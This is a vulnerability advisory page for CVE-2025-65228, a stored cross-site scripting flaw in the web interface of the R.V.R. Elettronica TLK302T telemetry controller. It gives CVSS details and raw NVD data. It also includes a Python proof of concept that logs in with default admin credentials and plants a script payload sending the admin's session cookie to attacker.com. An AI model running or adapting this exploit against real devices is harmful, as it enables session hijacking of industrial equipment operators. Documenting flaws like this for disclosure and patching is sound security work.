Security Vulnerability Report
中文
CVE-2025-65228 CVSS 3.5 LOW

CVE-2025-65228

Published: 2025-12-08 21:16:03
Last Modified: 2025-12-11 16:04:20

Description

A stored cross-site scripting vulnerability exists in the web management interface of the R.V.R. Elettronica TLK302T telemetry controller (firmware 1.5.1799).

CVSS Details

CVSS Score
3.5
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:rvr:tlk302t_firmware:1.5.1799:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rvr:tlk302t:-:*:*:*:*:*:*:* - NOT VULNERABLE
R.V.R. Elettronica TLK302T firmware 1.5.1799

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-65228 Stored XSS PoC # Target: R.V.R. Elettronica TLK302T Telemetry Controller # Firmware: 1.5.1799 TARGET_URL = "http://target-device.local" USERNAME = "admin" PASSWORD = "admin" def login(): """Authenticate to the web management interface""" session = requests.Session() login_data = { 'username': USERNAME, 'password': PASSWORD } response = session.post(f"{TARGET_URL}/login", data=login_data) return session if response.status_code == 200 else None def inject_xss_payload(session): """Inject stored XSS payload into device configuration""" # Malicious payload - steals session cookies xss_payload = "<script>document.location='http://attacker.com/steal?c='+document.cookie</script>" config_data = { 'device_name': xss_payload, 'description': '<img src=x onerror="alert(document.cookie)">', 'save': '1' } response = session.post(f"{TARGET_URL}/settings/device", data=config_data) return response.status_code == 200 def main(): print(f"[*] CVE-2025-65228 PoC for TLK302T Stored XSS") print(f"[*] Target: {TARGET_URL}") session = login() if session: print("[+] Login successful") if inject_xss_payload(session): print("[+] XSS payload injected successfully") print("[*] Payload will execute when admin visits device settings page") else: print("[-] Failed to inject payload") else: print("[-] Login failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65228", "sourceIdentifier": "[email protected]", "published": "2025-12-08T21:16:03.467", "lastModified": "2025-12-11T16:04:20.213", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stored cross-site scripting vulnerability exists in the web management interface of the R.V.R. Elettronica TLK302T telemetry controller (firmware 1.5.1799)."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rvr:tlk302t_firmware:1.5.1799:*:*:*:*:*:*:*", "matchCriteriaId": "7767F4AD-F424-4976-B49E-6F3FCAFFC481"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rvr:tlk302t:-:*:*:*:*:*:*:*", "matchCriteriaId": "58D76FB9-5345-49F8-86D6-0B47ACBF37F1"}]}]}], "references": [{"url": "https://github.com/iyadalkhatib98/My_CVES/tree/main/CVE-2025-65228", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.rvr.it/en/products/components/telemetry-units-system/tlk300-series/tlk302t/", "source": "[email protected]", "tags": ["Product"]}]}}